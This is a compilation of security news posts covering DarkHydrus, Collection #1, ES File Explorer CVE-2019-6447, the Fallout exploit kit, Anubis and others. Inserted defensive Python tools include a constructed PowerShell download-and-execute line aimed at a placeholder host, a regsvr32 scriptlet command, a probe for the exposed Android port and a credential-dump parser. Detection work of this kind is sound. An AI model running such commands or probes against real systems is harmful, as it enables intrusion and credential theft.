Posts by CSECybSec

Security experts have attributed new malicious campaigns to the DarkHydrus APT group (aka Lazy Meerkat); the threat actors used a new variant of the RogueRobin Trojan and leveraged Google Drive as an alternative C2 channel.

DarkHydrus was first discovered by experts at Palo Alto Networks’ Unit 42 team in July when the group carried out attacks aimed at a government agency in the Middle East.

The threat actors focused their activity on the Middle East and used weaponized Microsoft Excel documents to compromise victims’ systems.

On January 9, experts at 360’s Threat Intelligence Center (360 TIC) first observed attacks leveraging lure Excel documents written in Arabic.

“This malware is a lure Excel document with name ‘الفهارس.xlsm’. When it is opened, the embedded VBA macro is triggered to run. That macro drops 12-B-366.txt to the ‘%TEMP%’ directory first, then leverages regsvr32.exe to run 12-B-366.txt,” reads the analysis published by 360 TIC.

The final stage malware is a backdoor written in C#.

According to the analysis made by malware researchers from Palo Alto Networks, the text file includes parts of a Windows Script Component (.SCT) file that once concatenated delivers a version of the RogueRobin trojan.

“The New_Macro function starts by concatenating several strings to create a PowerShell script that it will write to the file %TEMP%\WINDOWSTEMP.ps1. The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%\12-B-366.txt.” reads the analysis published by Palo Alto Networks.

“While .sct files are used by a multitude of applications, in this instance it is being used as a Windows Script Component file. The function then uses the built-in Shell function to run the following command, which effectively executes the .sct file stored in 12-B-366.txt.”

The samples of the RogueRobin Trojan analyzed by Palo Alto Networks implement additional functionality, including use of the Google Drive API. This new feature allows the attackers to use Google Drive as an alternative Command and Control channel and makes detection of the malicious traffic harder.

The main communication channel with the C2 server is DNS tunneling.

“A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode. This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API.” continues Palo Alto Networks. “The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests.”

Once activated, the malware receives from the C2 server, via DNS tunneling, a list of settings that allow it to interact with Google Drive.

The commands are exchanged through a file the Trojan uploads to Google Drive; every change to that file is interpreted as a command.

The RogueRobin Trojan also checks whether it is running in a virtualized environment or a sandbox before triggering the payload.

According to Palo Alto Networks, the malware also checks for common analysis tools running on the system and the presence of a debugger.

“Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co. The domain is legitimate and owned by Google. The subdomain 676f6f646c75636b is a hex encoded string which decodes to goodluck.” states Palo Alto Networks.

Experts believe the DarkHydrus group continues its operations and has improved its techniques and its arsenal. The recent attacks show the group abusing open-source penetration testing techniques such as the regsvr32 AppLocker bypass.
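Two of the behaviours described above are cheap to look for in endpoint telemetry: regsvr32 being used to run a scriptlet stored in a non-DLL file (the AppLocker bypass) and DNS queries whose leftmost label is a hex-encoded string, as in the 676f6f646c75636b lookup. The block below is an added example written for this page, not code from Unit 42 or 360 TIC: it runs both checks over a few constructed process-creation and DNS events. The exact regsvr32 command line is not printed in the article, so the sample uses the standard /i:<file> scrobj.dll form as an assumption.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample telemetry, one event per line as "type|key=value|...".
# The regsvr32 /i:<file> scrobj.dll form is the standard way a .sct scriptlet is
# loaded; the article quotes the analysis but not the exact command (assumption).
SAMPLE_EVENTS = [
    "proc|image=C:\\Windows\\System32\\regsvr32.exe"
    "|cmdline=regsvr32.exe /s /u /i:C:\\Users\\u\\AppData\\Local\\Temp\\12-B-366.txt scrobj.dll",
    "proc|image=C:\\Windows\\System32\\regsvr32.exe"
    "|cmdline=regsvr32.exe /s \"C:\\Program Files\\App\\legit.dll\"",
    "dns|query=676f6f646c75636b.gogle.co",
    "dns|query=www.example.com",
    "dns|query=4a4f4232303139.c2-lookalike.test",
]

HEX_LABEL = re.compile(r"^[0-9a-fA-F]{8,}$")
INSTALL_ARG = re.compile(r"(?:^|\s)[/-]i:(\S+)", re.IGNORECASE)


def regsvr32_scriptlet_reason(cmdline: str) -> Optional[str]:
    """Explain why a regsvr32 command line looks like a scriptlet (.sct) load, or return None.

    Two heuristics: scrobj.dll is named on the command line (the scriptlet host),
    or the /i: install argument points at something that is not a DLL/OCX.
    """
    low = cmdline.lower()
    if "regsvr32" not in low:
        return None
    if "scrobj.dll" in low:
        return "regsvr32 invoked with scrobj.dll (scriptlet host)"
    m = INSTALL_ARG.search(cmdline)
    if m:
        target = m.group(1).strip('"').lower()
        if not target.endswith((".dll", ".ocx")):
            return f"regsvr32 /i: argument is not a DLL/OCX: {target}"
    return None


def decode_hex_label(qname: str) -> Optional[str]:
    """Decode the leftmost DNS label if it is an even-length hex string of printable ASCII."""
    label = qname.split(".")[0]
    if not HEX_LABEL.match(label) or len(label) % 2:
        return None
    raw = bytes.fromhex(label)
    if all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def parse_event(line: str) -> dict:
    """Split "type|key=value|..." into a dict; the first field is the event type."""
    kind, *fields = line.split("|")
    event = {"type": kind}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def hunt(events: List[str]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event matching one of the two behaviours."""
    hits = []
    for i, line in enumerate(events):
        ev = parse_event(line)
        reason = None
        if ev["type"] == "proc":
            reason = regsvr32_scriptlet_reason(ev.get("cmdline", ""))
        elif ev["type"] == "dns":
            text = decode_hex_label(ev.get("query", ""))
            if text:
                reason = f"hex-encoded DNS label decodes to {text!r}"
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == "__main__":
    for index, reason in hunt(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index].split("|")[0], reason)
```

The printable-ASCII test on the decoded label keeps ordinary hashes and random hex hostnames (which decode to binary) out of the results, which is what separates a tunnel label like 676f6f646c75636b from CDN noise.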

Further information, including IoCs for the malware used by the group, is reported in the analyses published by 360 TIC and Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – hacking, DarkHydrus)

The post DarkHydrus adds Google Drive support to its RogueRobin Trojan appeared first on Security Affairs.

Cybersecurity expert Marco Ramilli has analyzed the huge trove of data, called Collection #1, that was first disclosed by Troy Hunt.

A few weeks ago I wrote about “How Data Breaches Happen“, where I shared some publicly available “pasties” within apparently (not tested) SQLi vulnerable websites. One of the most famous data breaches in the past few years is happening these days. I am not saying that the two events are linked, but I have fun thinking that events happen in bursts. Many magazines all around the world wrote about the data breach (Collection #1) published by Troy Hunt on 773 million new records (here). Today I’d like to write a quick partial analysis that I’ve been able to extract from those records (I grabbed data from publicly available pasties websites). First of all, let me say that the work done has been super difficult (at least to me) since it required a huge amount of computational power and very high-speed internet access because of the humongous collected data. In order to make analysis over such a humongous data breach, I used a powerful Elastic Search Cloud instance and I wrote a tiny python script to import super dirty data into a common format. Some records were unable to load because of the format type, the charset or whatever they had, so please consider a relative error of about 4 to 5% (circa) in the following data analyses.

PARTIAL Analysis of Collection #1

One of the first questions I wanted to answer was: “What are the most used passwords?“. I am aware that many researchers wrote about the most used passwords, but now I do have the opportunity to measure it, to get real used passwords and to evaluate the reality. So let’s see what the most used passwords out there are!

Collection #1 PARTIAL Analysis on used passwords

So far the most used passwords are: “123456”, “q1w2e3r4t5y6”, “123456789”, “1qaz2wsx3edc”, followed by common passwords like “12345678” and “qwerty”. By observing the current graph and comparing it to common research on frequently used passwords such as here, here, and here we might appreciate a significant difference: the pattern complexity! In fact, while years ago the most used passwords were names, dates or simple patterns such as “qwerty”, today we observe a significant increase in pattern complexity, but still too easy to be brute-forced.

A second question came by looking at leaked emails: “What are the domain names of the most leaked emails?” Those domains are not the most vulnerable domains but rather the most used ones. So I’m not saying that those domains are or have been vulnerable or pwned, but I am trying to find out what the most leaked email providers are. In other words, if you receive an email from “” what is the probability that it has been leaked and potentially compromised? Again I cannot answer such a question since I do not have the total amount of “” accounts all around the world, but I think it might be a nice indicator to find out what the most leaked email domain names are.

PARTIAL Analysis on most leaked domain

The most leaked emails come from “”, “”, “” and “”. This is quite interesting since we are mostly facing personal email providers (domains) rather than professional email providers (such as So apparently, attackers are mostly focused on targeting people rather than companies (maybe attacking non-professional websites and/or distributing malware to people rather than to company domain names). Another interesting figure is the number of unique leaked email domain names: 4426, so far!

Finally, it would be great to know what sources the data is coming from! At this point I have no evidence of what I am going to write about, but I made some deductions from the leaked data structure. The following image shows the Collection #1 structure.

PARTIAL Analysis Collection#1 Structure

Each folder holds .TXT files whose names look like domain names. Some of those are really domain names (tested), some others are on sale right now, and many others just seem to look like a domain, but I had no evidence of them. Anyway, I decided to assume that the file names looking like domain names are the domains from which the attacker leaked information. So, with that in mind we might deduce where the attacker extracted the data (usernames and passwords) and perform a personal evaluation of the leaked information.
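The import step Ramilli describes (normalising dirty email/password records into a common format before loading them into Elasticsearch) and the two questions he answers can be reproduced on a small scale. The block below is an added example written for this page, not Ramilli's script: the sample records are constructed, the separators and the _bulk document layout are assumptions, and the analysis is only what the text describes, namely top passwords, top domains, the unique domain count and the share of unparsable lines.

```python
import json
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample records in the mixed "email:password" / "email;password" forms such
# dumps use, including one junk line. Not real data.
SAMPLE_DUMP = """\
alice@example.com:123456
bob@mail.example:q1w2e3r4t5y6
carol@example.com;123456
dave@example.org:hunter2
not a record at all
eve@mail.example:123456
frank@example.com:Pa$$:w0rd
"""

# The first ':' or ';' after the address separates it from the password, which may
# itself contain separators, so only the address part is split strictly.
RECORD_RE = re.compile(r"^\s*([^\s:;@]+@([^\s:;]+))[:;](.+)$")


def parse_record(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (email, domain, password) or None for a line that is not email<sep>password."""
    m = RECORD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group(1).lower(), m.group(2).lower(), m.group(3)


def analyze(lines: Iterable[str]) -> Dict[str, object]:
    """Most used passwords, most leaked domains, unique domains, and the unparsed share."""
    passwords: Counter = Counter()
    domains: Counter = Counter()
    total = unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        total += 1
        rec = parse_record(line)
        if rec is None:
            unparsed += 1  # the "relative error" Ramilli mentions: lines that do not load
            continue
        _, domain, password = rec
        passwords[password] += 1
        domains[domain] += 1
    return {
        "records": total,
        "unparsed": unparsed,
        "error_rate": unparsed / total if total else 0.0,
        "top_passwords": passwords.most_common(5),
        "top_domains": domains.most_common(5),
        "unique_domains": len(domains),
    }


def to_bulk_ndjson(lines: Iterable[str], index: str = "collection1") -> List[str]:
    """Elasticsearch _bulk body (action line, document line) for every parsable record.

    Index name and field names are assumptions for this example.
    """
    out: List[str] = []
    for line in lines:
        rec = parse_record(line)
        if rec:
            email, domain, password = rec
            out.append(json.dumps({"index": {"_index": index}}))
            out.append(json.dumps({"email": email, "domain": domain, "password": password}))
    return out


if __name__ == "__main__":
    stats = analyze(SAMPLE_DUMP.splitlines())
    print(stats["top_passwords"], stats["top_domains"], stats["unique_domains"])
    print(f"unparsed: {stats['error_rate']:.1%}")
```

Splitting on the first separator after the address rather than on every separator is what keeps passwords like Pa$$:w0rd intact; counting the rejected lines alongside the parsed ones gives the error margin to report with the statistics.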

Are you interested in Marco Ramilli’s conclusions? Take a look at his post:

Pierluigi Paganini

(SecurityAffairs – hacking, collection #1)

The post “Collection #1” Data Breach Analysis – Part 1 appeared first on Security Affairs.

Paying attention to cybersecurity is more important than ever in 2019. But, some companies are still unwilling to devote the necessary resources to securing their infrastructures against cyberattacks, and naive individuals think they’re immune to the tactics of cybercriminals, too.

For people who still need some convincing that cybersecurity is an essential point of focus, here are six reasons.

1. The Average Cost of a Cyberattack Exceeds $1 Million

It’s no surprise that cyberattacks are costly, but some people will likely be shocked at the massive expenses that could result. According to a recent report from Radware, the total costs are more than $1 million. Additionally, victims report issues not directly related to financial losses, such as decreases in productivity or negative customer experiences.

Based on the above statistic, enterprises should conclude that although it costs money to invest in cybersecurity strategies, the expenses could be more substantial if organizations choose not to put enough of their resources toward experts and tools that minimize threats.

2. The U.S. Government Says It’s Time to Come Up With a Better Plan

The U.S. government, as well as the authorities of other nations, continually struggles to safeguard against digital attacks from rivals. The challenges are so immense that government bodies and officials warn that the United States needs an improved way to stop adversaries.

A State Department report warned that the country is increasingly dependent on networked information systems, and foes from other nations have learned to exploit that dependence and use it to disrupt the lives of

Most people who live in the U.S. can at least imagine the consequences of a severe cyber attack that affected the country’s ability to proceed with normal operations. Since government authorities researched the possibility and asserted there’s no time to waste in coming up with an improved approach to cybersecurity, that’s all the more reason to take action this year.

3. The Methods of Attack Are Diversifying

A decade or so ago, people typically felt sufficiently secure online by installing anti-virus software on their computers. That’s still a worthy precaution to take, but it’s no longer adequate for preventing all or even most of the attacks a hacker might try.

According to a 2014 report, cybercriminals orchestrated 75 percent of attacks through publicly known software vulnerabilities. But they also try to gain people’s credentials through phishing attacks, lock down their systems with ransomware or infiltrate poorly secured connected devices, to name but a few possibilities.

People have a growing number of ways to use technology and rely on connected devices, but that also means the likelihood goes up for potentially unfamiliar kinds of attacks. Focusing on cybersecurity this year requires, in part, understanding the most recent and common types of threats and protecting networks against them.

4. Recent Breaches Victimized Millions

Equifax and Starwood/Marriott dealt with breaches that compromised the data of well over 100 million victims. The earlier revelation about the financial costs of cyber attacks is damning in itself, but it’s crucial for brands — and consumers themselves — to recognize that data breaches can be unintentional or malicious, but in any case, they could affect millions of people.

Then, affected companies have to engage in damage control in an attempt to restore lost trust. Even when those entities put forth the effort, they may still find that customers behave differently following breaches.

More specifically, an April 2018 study examined the connection between consumer trust and spending. It involved respondents giving a trust score to businesses. The survey revealed that 15 percent of low-trust customers decreased how much they spent at companies, whereas among high-trust customers the decrease in spending was only 4 percent.

5. It Takes Months to Identify and Contain

If a person or business has a significant water leak in a well-used area, the problem is usually easy to spot and fix. But it’s typically not so straightforward with cyber-related issues.

Research from 2018 published by IBM found that, on average, it takes 197 days to identify a breach and 69 days to contain it. Those timeframes give hackers plenty of time to do damage that may prove irreparable. Then, once headlines indicate how long a breach remained unnoticed, the reputational damage could be severely harmful, too.

Making cybersecurity a focal point this year could minimize the time spent looking for areas of concern within a network, especially if using artificial intelligence-based strategies that learn normal conditions and give warnings about deviations.

6. Cybercrime Is Extremely Profitable

Some criminals alter their methods once it becomes apparent that their current wrongdoings are no longer profitable. But that probably won’t happen for a while concerning online-based crimes. Research from a criminology expert published in April 2018 highlighted how the worldwide revenues from cybercrime are at least 1.5 trillion annually.

The investigation talked about how cybercrime represents an interconnected web of profit possibilities with blurred lines between legal and illegal activities. If people don’t fight back against online criminals at both personal and organizational levels, hackers will have more opportunities than ever to continue making income while others suffer.

Failing to Focus on Cybercrime This Year Could Cause an Assortment of Issues

This list highlights some of the most prominent reasons why it’s essential to make cybersecurity a priority in 2019. Hackers get progressively more skilled at carrying out attacks, and they can cause significant catastrophes on unprotected or poorly defended

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – 2019 Cybersecurity predictions, cyberattacks)

The post 6 Reasons We Need to Boost Cybersecurity Focus in 2019 appeared first on Security Affairs.

A bug in the Microsoft partner portal exposed the titles of support requests to all partners; fortunately, no customer data was exposed.

The Register reported in an exclusive that the Microsoft partner portal ‘exposed every support request filed worldwide.’ Tickets submitted from all over the world were visible to all Microsoft support partners due to the glitch.

“At the moment in the Microsoft Partner Portal you can see every ticket title for every support request worldwide!” Stuart Crane of IT biz Everon told The Register.


“Another Microsoft small biz specialist contacted us to say ‘Logged on to my Microsoft Partner portal to check status of a ticket I have open with them only to see lots of tickets which are not ours’,” reported The Register.

According to another Microsoft partner quoted by The Register, the bug exposed the case number and title of the tickets, but not their content. This means the problem is unlikely to cause Microsoft trouble with data protection laws or watchdogs.

Microsoft quickly addressed the flaw and downplayed the issue explaining that only a limited number of features in the Partner Centre portal were affected.

“We’ve addressed an issue that impacted a small subset of functions on our Partner Centre portal and we’re working to restore normal operation,” said a spokesperson for Microsoft.

Pierluigi Paganini

(SecurityAffairs – Microsoft partner portal, data leak)

The post A bug in Microsoft partner portal ‘exposes ‘ support requests to all partners appeared first on Security Affairs.

Security expert Robert Baptiste (aka Elliot Alderson) discovered a vulnerability (CVE-2019-6447) in ES File Explorer that potentially exposes more than 100 million Android installs.

The ES File Explorer is an Android file manager that has over 100,000,000 installs and more than 500 million users worldwide according to its developer.

Baptiste discovered that the application starts a local HTTP server that listens on TCP port 59777.

The expert noticed that even if the app is closed, the server keeps running until the user kills all of ES File Explorer’s background services.

An attacker who can reach that port can connect to the server and retrieve device information, including the list of installed apps. The scary aspect of the flaw is that a remote attacker can also pull a file from the victim’s device and launch an app on the phone.

“The ES File Explorer File Manager application through for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network.” reads the description provided by the Mitre.

“This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.”

The attack works even if the victim never granted the app any permissions on the Android device.

Baptiste published PoC code on GitHub that an attacker sharing the same Wi-Fi network could use to list and download files from the victim’s device and SD card, launch apps, and view device information.

With the following Proof Of Concept (POC), you can:

  • List all the files in the sdcard in the victim device
  • List all the pictures in the victim device
  • List all the videos in the victim device
  • List all the audio files in the victim device
  • List all the apps installed in the victim device
  • List all the system apps installed in the victim device
  • List all the phone apps installed in the victim device
  • List all the apk files stored in the sdcard of the victim device
  • List all the apps installed in the victim device
  • Get device info of the victim device
  • Pull a file from the victim device
  • Launch an app of your choice
  • Get the icon of an app of your choice
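The behaviour above (an unauthenticated HTTP service on TCP 59777 that answers JSON) is easy to audit for on a network you own. The following is an added example, not Baptiste's PoC and not code from the article: a small scanner that POSTs one JSON command to each host and reports the ones that reply with JSON, plus a constructed stand-in server so it can be run offline. The command name getDeviceInfo follows the naming used in the public PoC and is an assumption here; the reply fields of the stand-in are made up.

```python
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional, Tuple

ES_PORT = 59777


def probe_es_port(host: str, port: int = ES_PORT, timeout: float = 1.0) -> Optional[dict]:
    """Send an unauthenticated JSON command over HTTP; return the parsed JSON reply or None.

    A device that answers a JSON body on this port without any authentication
    exhibits the behaviour described in CVE-2019-6447. The command name follows the
    public PoC (assumption; the article lists the capabilities, not the wire format).
    """
    body = json.dumps({"command": "getDeviceInfo"})
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("POST", "/", body=body, headers={"Content-Type": "application/json"})
        resp = conn.getresponse()
        data = resp.read()
        conn.close()
    except (OSError, http.client.HTTPException):
        return None  # closed port, timeout, or not speaking HTTP at all
    if resp.status != 200:
        return None
    try:
        reply = json.loads(data)
    except ValueError:
        return None
    return reply if isinstance(reply, dict) else None


def scan(hosts: List[str], port: int = ES_PORT) -> List[str]:
    """Hosts on the local network that answer like the exposed server."""
    return [h for h in hosts if probe_es_port(h, port) is not None]


class _FakeESHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a vulnerable device, so the scanner can be exercised offline."""

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", 0))
        try:
            payload = json.loads(self.rfile.read(length) or b"{}")
        except ValueError:
            payload = {}
        command = payload.get("command") if isinstance(payload, dict) else None
        reply = json.dumps({"command": command, "model": "constructed-device"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args) -> None:  # silence request logging
        pass


def start_fake_server() -> Tuple[HTTPServer, int]:
    """Bind the stand-in to an ephemeral loopback port and serve it from a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), _FakeESHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_fake_server()
    print("exposed hosts:", scan(["127.0.0.1"], port))  # a real audit scans the Wi-Fi subnet on 59777
    server.shutdown()
    server.server_close()
```

Against real devices, run scan() over the addresses of your own Wi-Fi subnet with the default port; a hit means the phone is still running the vulnerable server and the app should be force-stopped and updated.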

As reported by Bleeping Computer, a few hours after Baptiste disclosed the CVE-2019-6447 flaw, ESET cybersecurity expert Lukas Stefanko announced the discovery of another local vulnerability in ES File Explorer.

An attacker on the local network could exploit this second flaw to carry out a Man-in-the-Middle (MitM) attack, intercepting the app’s HTTP network traffic and replacing it with their own.

ES File Explorer versions up to are affected by this MitM flaw.

At the time of writing, the ES File Explorer development team had announced a fix for “the http vulnerability issue,” but other bugs remain to be fixed.

Pierluigi Paganini

(SecurityAffairs – ES File Explorer, Android)

The post ES File Explorer vulnerabilities potentially impact 100 Million Users appeared first on Security Affairs.

Experts at Malwarebytes have reported that the code for the recently discovered Flash zero-day flaw was added to the Fallout Exploit kit.

Experts at Malwarebytes observed a new version of the Fallout Exploit kit that include the code to exploit a recently discovered Flash zero-day vulnerability.

The Fallout Exploit kit was discovered at the end of August by the threat analyst nao_sec; at the time it was used to distribute the GandCrab ransomware and other malicious code, including droppers and potentially unwanted programs (PUPs).

First detailed in September 2018, the toolkit was observed delivering malware families ranging from ransomware to backdoors, but also fingerprinting the browser profile to identify targets of interest.

Activity associated with the Fallout exploit kit was temporarily suspended in early January, likely to improve the kit; in the same period experts at Malwarebytes observed an increase in RIG EK activity.

The Fallout EK was distributed mainly via malvertising chains; starting January 15 it was used to deliver the GandCrab ransomware.

“After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year.” reads the post published by Malwarebytes.

“The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.”

One of the most important improvements in the Fallout Exploit kit is the exploit for the recently discovered Adobe Flash Player zero-day tracked as CVE-2018-15982.

The CVE-2018-15982 flaw is a critical use-after-free bug that was exploited by an advanced persistent threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code, Adobe addressed it with the release of Flash Player for Windows, macOS, Linux, and Chrome OS.

The first exploit kit that integrated the code to trigger the CVE-2018-15982 flaw in mid-December was Underminer.

The new Fallout Exploit kit adds HTTPS support and a new landing page format, and uses PowerShell to run the final payload.


“The Base64 encoded Powershell command calls out the payload URL and loads it in its own way,” continues the analysis. “This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.”
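Malwarebytes notes that the new Fallout chain runs the final payload through a Base64-encoded PowerShell command rather than letting the Internet Explorer process drop it. The block below is an added example, not code from Malwarebytes or from the exploit kit: it recovers the script behind a -EncodedCommand argument (Base64 of UTF-16LE, accepting the abbreviations powershell.exe allows) and pulls out the payload URL, which is the first thing an analyst wants from such a command line. The sample command line is constructed with a placeholder URL.

```python
import base64
import re
from typing import List, Optional

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def _is_encoded_flag(token: str) -> bool:
    """True for -EncodedCommand and the abbreviations powershell.exe accepts (-e, -en, -enc, ... and -ec)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in a powershell -EncodedCommand argument, or None.

    PowerShell expects Base64 of the UTF-16LE script; padding is repaired because
    loaders sometimes strip it. Anything that is not valid Base64/UTF-16 yields None.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not _is_encoded_flag(tok):
            continue
        blob = tokens[i + 1].strip("'\"")
        blob += "=" * (-len(blob) % 4)
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def extract_payload_urls(cmdline: str) -> List[str]:
    """URLs referenced by the decoded script: the payload locations to pivot on."""
    script = decode_encoded_command(cmdline)
    return URL_RE.findall(script) if script else []


def encode_for_powershell(script: str) -> str:
    """Inverse transform, used here only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a download-and-execute one-liner behind -enc. The URL is a
# placeholder, not an indicator from the Malwarebytes analysis.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://payload.example/stage2.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(extract_payload_urls(SAMPLE_CMDLINE))
```

Run the decoder over the command-line field of process-creation events where the image is powershell.exe; the useful detection signal is not the encoding itself but a decoded script that downloads from the web while the parent is a browser process.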

This development is proof that exploit kit developers continuously monitor newly disclosed flaws and improve their code to trigger the most recent ones.

Pierluigi Paganini

(SecurityAffairs – Fallout Exploit kit, cybercrime)

The post Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day appeared first on Security Affairs.

Security experts from Trend Micro have recently spotted two Android apps that use the motion sensor to evade detection and spread the Anubis banking Trojan.

Malware authors continue to improve their malicious apps to avoid detection and infect the largest number of users.

Security experts from Trend Micro have recently spotted two Android apps in the Google Play Store, Currency Converter and BatterySaverMobi, that infected thousands of users with banking malware.


Currency Converter masquerades as a currency exchange app and BatterySaverMobi as a battery saver app; both use the motion sensors of infected Android devices to evade detection. The sensor readings are checked before the banking Trojan, dubbed Anubis, is installed.

With this trick, the malware authors attempt to avoid detection: the malicious code notices the absence of motion sensor data in the emulators researchers use to analyze apps and stays dormant.

“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER). These apps don’t just use traditional evasion techniques; they also try to use the user and device’s motions to hide their activities.” reads the analysis published by Trend Micro.

“As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data. If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.”

The infection process does not start if the sensor data indicates that the device and the user are not moving.

If the app sees sensor data, it runs the malicious code and then attempts to trick the victim into downloading and installing the Anubis payload APK via a fake system update, masquerading it as a “stable version of Android.”

If the user accepts the bogus system update, the dropper uses requests and responses over legitimate services such as Twitter and Telegram to locate its C2 server, then downloads the Anubis banking Trojan and installs it.

“Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.” continues the analysis.

Experts pointed out that the Anubis banking Trojan uses a built-in keylogger to steal credentials and is also able to take screenshots of the user’s screen while they enter credentials into any banking app.

Experts observed infections in 93 different countries; the latest variant of the Anubis banking Trojan targets at least 377 variations of financial apps.

The banking Trojan is also able to access contact lists and location, send spam messages to contacts, call numbers from the device, record audio, and alter external storage.

Further details on the malware, including IoCs are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Anubis banking Trojan, motion sensor)

The post Android apps use the motion sensor to evade detection and deliver Anubis malware appeared first on Security Affairs.

Oracle released the first critical patch advisory for 2019 that addresses a total of 284 vulnerabilities, 33 of them are rated “critical”.

Let’s take a closer look at some of the vulnerabilities fixed by this patch advisory.

The advisory fixed CVE-2016-1000031, a remote code execution (RCE) bug in Apache Commons FileUpload disclosed in November last year. The Commons FileUpload library is the default file upload mechanism in Struts 2; CVE-2016-1000031 was discovered two years ago by experts at Tenable.

The bug affected OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The flaw also affected the Financial Services Analytical Applications Infrastructure, the Fusion Middleware MapViewer, and several Oracle Retail components.

A vulnerability in the Apache Log4j tracked as CVE-2017-5645 impacted the Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion’s GoldenGate app adapters and SOA Suite, and also a Sun tape library component.

A flaw in the Codehaus versions of Groovy affected OCA Unified Inventory Management.

The first critical patch advisory for 2019 also fixed the CVE-2018-11776 Apache Struts 2 vulnerability in OCA’s Communications Policy Management component; this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw (CVE-2018-9206) in the OCA’s Services Gatekeeper that also impacted Primavera P6 in the Construction and Engineering Suite, and Siebel CRM.

Another bug fixed by Big Red affected the Oracle E-Business Suite’s Performance Management component, tracked as CVE-2019-2453:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management.” reads the description provided by Oracle.

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data. “

Oracle also addressed CVE-2016-4000, a flaw in Jython that provided a vector for arbitrary code execution; Jython is used by the Oracle Enterprise Manager platform, Banking Platform, and Utilities Network Management System.

The list is very long; it also includes patches for a DoS in the Apache Derby tool used in the WebLogic server (CVE-2015-1832) and an RCE bug in the Spring framework used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:

Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)

The post Oracle critical patch advisory addresses 284 flaws, 33 critical appeared first on Security Affairs.

A bug in the Twitter app for Android may have exposed protected tweets, the social media platform revealed on Thursday.

The bug in the Android Twitter app affects the “Protect my Tweets” option in the account’s “Privacy and safety” settings, which restricts viewing of a user’s posts to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after making certain changes to their account settings, for example changing the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the “Protect your Tweets” setting if certain account changes were made.” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The bug was introduced on November 3, 2014, and fixed on January 14, 2019; users of the iOS app or the web version were not impacted.

